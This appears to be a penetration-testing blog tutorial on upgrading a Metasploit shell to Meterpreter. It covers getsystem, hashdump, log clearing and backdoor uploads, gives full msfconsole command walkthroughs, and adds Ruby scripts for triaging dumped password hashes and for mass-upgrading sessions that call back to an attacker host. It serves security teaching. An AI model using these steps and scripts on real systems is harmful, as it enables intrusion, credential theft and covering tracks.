Thu May 11

Metasploit: Upgrade Shell to Meterpreter

In another article, we talked at length about Metasploit and how it can be used to compromise a target system. In many cases the session you end up with is a plain command shell, and you will want to upgrade it to Meterpreter to get the full benefit of the framework's post-exploitation features.

What is Meterpreter?

Put simply, Meterpreter is an advanced payload that you interact with much as you would a normal shell, but which runs in memory on the target and exposes commands a plain shell does not have. Those extra commands give you a substantial advantage over a compromised system, which is the main reason for upgrading a shell to Meterpreter.

The Meterpreter commands

Meterpreter offers many commands that help during post-exploitation. Most of them come from the stdapi extension, which is loaded automatically and listed by the help command; others belong to extensions that only exist for some targets (for example priv, which provides getsystem and hashdump on Windows). Because the underlying operating systems differ (Linux vs Windows), some of the commands below exist, or fully work, on only one of them.

Identification commands

getuid : prints the user the Meterpreter server is running as. On Windows this tells you which account, and therefore which privilege level, you currently hold on the compromised host; for example Server username: NT AUTHORITY\SYSTEM means you already run as the local SYSTEM account. On Linux it reports the user the process runs as.

getpid : reports the process ID (PID) of the process hosting the current Meterpreter payload. Check it before and after a migrate to confirm the migration actually happened.

ps : lists the running processes on the target with their PIDs, names, owners and (on Windows) architecture and session. From this list you pick the PID to hand to kill or migrate.

Privilege escalation and related commands

getsystem : tries several built-in techniques (named-pipe impersonation and token duplication) to elevate the session to NT AUTHORITY\SYSTEM. It is Windows-only and it is not a general exploit: the techniques need privileges you already hold, typically local administrator rights or the SeImpersonatePrivilege that service accounts carry, so on a genuinely low-privileged session it usually fails and you need a local exploit first (post/multi/recon/local_exploit_suggester helps pick one). When it succeeds you run as SYSTEM and can do anything on the host.

hashdump : dumps the local password hashes from the SAM (Security Account Manager) database, one line per account in the form user:RID:LM hash:NT hash:::. Windows stores hashes, not plaintext passwords, so you either crack the NT hash offline (hashcat mode 1000 or John's NT format) or use it directly in a pass-the-hash attack, for example with the psexec module. It needs SYSTEM privileges, so run getsystem first if getuid does not already show NT AUTHORITY\SYSTEM.

clearev : clears the Application, System and Security event logs on a Windows target. It does obscure what you did, but it is not silent: Windows records the clearing itself as event ID 1102 (Security log cleared) and 104 (System or Application log cleared), which are exactly what many detection rules alert on, and logs already forwarded to a SIEM are untouched. Use it only if the engagement's rules of engagement allow it.

migrate : moves the Meterpreter payload into another process. The usual reasons are stability (the exploited process may crash or exit, taking the session with it), getting into a process whose architecture matches the host, or gaining the context a particular action needs (a process on the interactive desktop for screenshots or keystroke capture, for example). Migration does not by itself raise your privileges: you can only migrate into a process you already have the right to open, so moving into a SYSTEM process such as winlogon.exe requires that you already hold SYSTEM or administrator rights. Use ps to pick a target PID and getpid to confirm the move.
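
The hashdump entry above says the hashes have to be cracked (or passed) rather than read; the following Ruby script is an added example, not code from the original article or from Metasploit, showing what a practitioner actually does with the dump: parse the user:RID:LM:NT::: lines, separate accounts whose NT hash is the well-known empty-password hash (nothing to crack), flag accounts that still store a real LM hash (far easier to crack), and emit the unique NT hashes for hashcat mode 1000. The sample dump is constructed from published test vectors (the NT and LM hashes of "password"), not from any real host.

```ruby
# Added example, not from the original article: parse Meterpreter's hashdump
# output, split out what can be cracked, and flag what needs no cracking at all.
# hashdump prints one SAM entry per line as  USER:RID:LM_HASH:NT_HASH:::

EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee' # LM hash of "" : LM storage is disabled
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0' # NT hash of "" : the account has a blank password

# Constructed sample dump built from well-known test vectors (NT("password"),
# LM("password")); these are not hashes taken from any real host.
SAMPLE_HASHDUMP = <<~DUMP
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  bob:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
  legacy:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
  [*] Not a hash line, as you might get mixed into a pasted log
DUMP

HashEntry = Struct.new(:user, :rid, :lm, :nt) do
  def blank_password?
    nt == EMPTY_NT
  end

  # A real LM hash means the password is at most 14 characters and case-folded,
  # which makes it a much easier target than the NT hash.
  def lm_stored?
    lm != EMPTY_LM
  end

  # pwdump-style line accepted by `john --format=NT` (and `--format=LM`)
  def john_line
    "#{user}:#{rid}:#{lm}:#{nt}:::"
  end
end

HASH_LINE = /\A([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::\z/i

# Returns one HashEntry per well-formed line; anything else (status lines,
# prompts, blank lines) is dropped.
def parse_hashdump(text)
  text.each_line.map do |line|
    m = HASH_LINE.match(line.strip)
    m && HashEntry.new(m[1], m[2].to_i, m[3].downcase, m[4].downcase)
  end.compact
end

# Group accounts by what to do with them. :to_crack is the unique NT hashes for
# `hashcat -m 1000`; accounts with blank passwords never need cracking.
def triage(entries)
  {
    blank:    entries.select(&:blank_password?).map(&:user),
    lm:       entries.select(&:lm_stored?).map(&:user),
    to_crack: entries.reject(&:blank_password?).map(&:nt).uniq
  }
end

if __FILE__ == $PROGRAM_NAME
  report = triage(parse_hashdump(SAMPLE_HASHDUMP))
  puts "blank passwords : #{report[:blank].join(', ')}"
  puts "LM hash present : #{report[:lm].join(', ')}"
  puts 'NT hashes to crack (hashcat -m 1000):'
  report[:to_crack].each { |h| puts "  #{h}" }
end
```

Paste the real hashdump output into SAMPLE_HASHDUMP (or read it from a file) and the triage tells you which accounts are already open, which ones have a weak LM hash worth attacking first, and which NT hashes are worth the cracking time; the same NT hash is also what psexec takes for pass-the-hash.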

File manipulation

download : copies a file from the target to your machine. The file lands in your local working directory (shown by lpwd or getlwd) unless you give a destination path.

upload : copies a file from your machine to the target, for example additional tooling, or a backdoor used to establish persistence, before going further with the attack. Anything you upload is a forensic artifact: note it, and remove it at the end of the engagement.

There is a whole lot more Meterpreter offers. For example, the arp command shows the target's IP-to-MAC address cache, which reveals other hosts on the same network segment, and the basic Linux-style file system commands (ls, cd, cat and so on) work regardless of the target operating system. Which commands matter depends on the situation you are in.

Upgrading shell to Meterpreter

Meterpreter provides a wide range of post-exploitation capabilities, including executing commands, capturing keystrokes, stealing credentials and pivoting to other systems on the network, which makes it a valuable tool for penetration tests and other security assessments. Upgrading from a basic shell to Meterpreter therefore significantly improves your ability to gather information, escalate privileges and maintain access on the target.

Here is a step-by-step tutorial on how to upgrade a shell to Meterpreter.

Set current shell session to background

For the purpose of this explanation, assume you have gained access to a Windows host with the EternalBlue exploit (windows/smb/ms17_010_eternalblue) using a plain shell payload such as windows/x64/shell/reverse_tcp. You get an interactive Windows command prompt (cmd.exe, not PowerShell) like this:

C:\Windows\System32>

Send this shell to the background before proceeding: press Ctrl-Z and answer y to the Background session 1? [y/N] prompt.

Searching for the shell_to_meterpreter module

You are now back at the msfconsole prompt, still inside the exploit module's context; leave it with the back command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > back


msf6 >

Then search for the post module that upgrades a shell to Meterpreter.

msf6 > search shell_to_meterpreter

It should return a single result, post/multi/manage/shell_to_meterpreter. Select it with the use command, either by name or by its index in the search results.

msf6 > use 0


msf6 post(multi/manage/shell_to_meterpreter) >

Configuring options

As usual, check the module's options with show options or simply options.

msf6 post(multi/manage/shell_to_meterpreter) > options

The only required option is SESSION, the ID of the shell session to upgrade, which is the shell we just sent to the background. The module also starts a listener of its own, so LHOST must be an address of your machine that the target can reach (check it if you have more than one interface) and LPORT defaults to 4433. To see the active sessions, use sessions -l (or just sessions).

msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

At the far left is the session ID. In our case the shell is session 1, so point the module at it.

msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1

Then run the module (run and exploit are equivalent here):

msf6 post(multi/manage/shell_to_meterpreter) > run

The module starts a handler, sends a stager through the existing shell and waits for the new Meterpreter session to connect back. If everything worked you will see a Meterpreter session opened message followed by Post module execution completed, and you are returned to the prompt.

msf6 post(multi/manage/shell_to_meterpreter) >

If you list the sessions again, you should see a new Meterpreter session alongside the original shell, which stays open as well.


 1  shell x64/windows
 2   meterpreter x64/windows

Switch to Meterpreter session

We have successfully upgraded the shell to Meterpreter. To use it, interact with the new session by its ID.

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2

The prompt changes to the Meterpreter prompt.

meterpreter >

Run help to see all available commands, including the ones mentioned earlier. Note that the same upgrade can be done in a single step with sessions -u 1, which runs this module with its default options against session 1; the manual route above is useful when you need to change LHOST or LPORT.
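
The walkthrough above upgrades one session by hand. The following Ruby snippet is an added example, not code from the original article or from the Metasploit project, that performs the same steps for every plain shell session at once from inside msfconsole, using the framework's own Ruby API (framework.sessions and run_single, which only exist inside msfconsole's irb prompt or a resource script's <ruby> block). UPGRADE_LHOST is an assumed lab address; replace it with an address of your own machine that the targets can reach.

```ruby
# Added example, not part of the article: upgrade every plain shell session to
# Meterpreter in one go, from inside msfconsole. Paste it into msfconsole's `irb`
# prompt, or wrap it in <ruby> ... </ruby> inside a resource script run with
# `msfconsole -r upgrade.rc`. `framework` and `run_single` exist only in those
# contexts, so outside msfconsole the file loads but the upgrade loop does nothing.
# UPGRADE_LHOST is a lab assumption; use an address of your own box the target can reach.

UPGRADE_LHOST = '192.168.56.1'   # hypothetical attacker address
UPGRADE_LPORT = 4433             # the module's default handler port

# Session ids that are still plain shells; Meterpreter sessions are left alone.
# `sessions` is the framework's id => session hash (framework.sessions).
def shell_session_ids(sessions)
  sessions.select { |_id, s| s.type == 'shell' }.keys.sort
end

# The same msfconsole commands the manual walkthrough uses, for one session.
# Each session gets its own listener port so a handler left over from the
# previous upgrade cannot block the bind.
def upgrade_commands(sid, lhost, base_port)
  [
    'use post/multi/manage/shell_to_meterpreter',
    "set SESSION #{sid}",
    "set LHOST #{lhost}",
    "set LPORT #{base_port + sid}",
    'run',
    'back'
  ]
end

if defined?(framework) && defined?(run_single)
  shell_session_ids(framework.sessions).each do |sid|
    upgrade_commands(sid, UPGRADE_LHOST, UPGRADE_LPORT).each { |cmd| run_single(cmd) }
  end
  run_single('sessions -l')   # the new Meterpreter sessions should now be listed
end
```

After it finishes, every original shell session is still open next to its new Meterpreter session (the module does not close the shell), so kill the ones you no longer need with sessions -k to keep the session list readable.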

Conclusion

Meterpreter is a game-changer when it comes to working with the Metasploit framework. Its post-exploitation abilities let you dig deep into a target system and do things a basic shell simply cannot. For example, you can use it to gather all sorts of useful information about the system and the network it sits on, such as who is logged in, what software is installed and which ports are open and active. You can also escalate to SYSTEM with getsystem, or with a local exploit when that fails.

On top of these capabilities, Meterpreter ships extensions that handle specific tasks, such as taking screenshots (screenshot in stdapi) or capturing network traffic with the sniffer extension (load sniffer), which makes it a versatile tool that adapts to a wide range of scenarios and objectives.